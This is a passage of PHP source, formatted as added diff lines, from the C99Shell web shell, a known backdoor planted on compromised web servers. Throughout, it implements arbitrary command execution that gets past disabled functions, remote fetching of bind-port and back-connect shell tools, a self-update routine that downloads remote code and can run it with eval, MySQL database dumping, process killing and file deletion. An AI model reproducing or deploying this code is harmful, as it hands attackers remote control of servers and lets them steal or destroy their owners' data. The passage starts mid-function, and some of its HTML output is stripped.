fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + else {return "".view_perms(fileperms($o))."";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ + global $c99sh_sourcesurl; + $array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return FALSE;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = TRUE) +{ + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually here.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo ""; + if ($tbl_struct) + { + echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



     
    Fields:
    "; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» ".$name."
    ";} + echo "
    "; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "ON (secure)"; +} +else {$safemode = FALSE; $hsafemode = "OFF (not secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "".$v."";} +else {$openbasedir = FALSE; $hopenbasedir = "OFF (not secure)";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><?php echo getenv("HTTP_HOST"); ?> - phpshell

    !C99Shell v. !

    Software:  

    uname -a: ",1); ?> 

    ",1);} else {echo get_current_user();} ?> 

    Safe-mode: 

    ".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; + $i++; +} +echo "   "; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "[ ok ]"; + echo "".view_perms(fileperms($d)).""; +} +else +{ + $wd = FALSE; + $wdt = "[ Read-Only ]"; + echo "".view_perms_color($d).""; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === FALSE) {$free = 0;} + if ($total === FALSE) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "
    Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)"; +} +echo "
    "; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "".$letter."";} + $letters .= " ] "; + } + } + if (!empty($letters)) {echo "Detected drives: ".$letters."
    ";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "".$item[0]."    "; + } +} +echo "


    "; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
    ".$donated_html."

    ";} +echo ""; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";} + $line[] = "KILL"; + $prcs[] = $line; + echo ""; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg("",$ret)) {$ret = str_replace("","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode("",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i".trim($head[$i])."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo ""; + $line = explode("",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo ""; + } + } + } + $head[$k] = "".$head[$k]."".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "
    "; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?>

    Attention! SQL-Manager is NOT ready module! Don't reports bugs.

    "; + if (!$sql_sock) {?>"; + } + echo "
    SQL Manager:
    "; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "
    Can't connect
    "; echo "".$err."";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    "; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + } + echo "
    i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
  •  Please, fill the form:
    UsernamePassword Database 
    HostPORT
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?>
    Home

    Please, select database
    "; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "
    There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "
    "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



     
    ";} + } + if (in_array($sql_act,$acts)) + { + ?>
    Create new table:
     
    Dump DB:
    "> 
    ";} + if ($sql_act == "newtbl") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "
    SQL-Dump:

    "; + echo "DB: 

    "; + $v = join (";",$dmptbls); + echo "Only tables (explode \";\") 1: 

    "; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "File: 

    "; + echo "Download:  

    "; + echo "Save to file:  "; + echo "



    1 - all, if empty"; + echo "
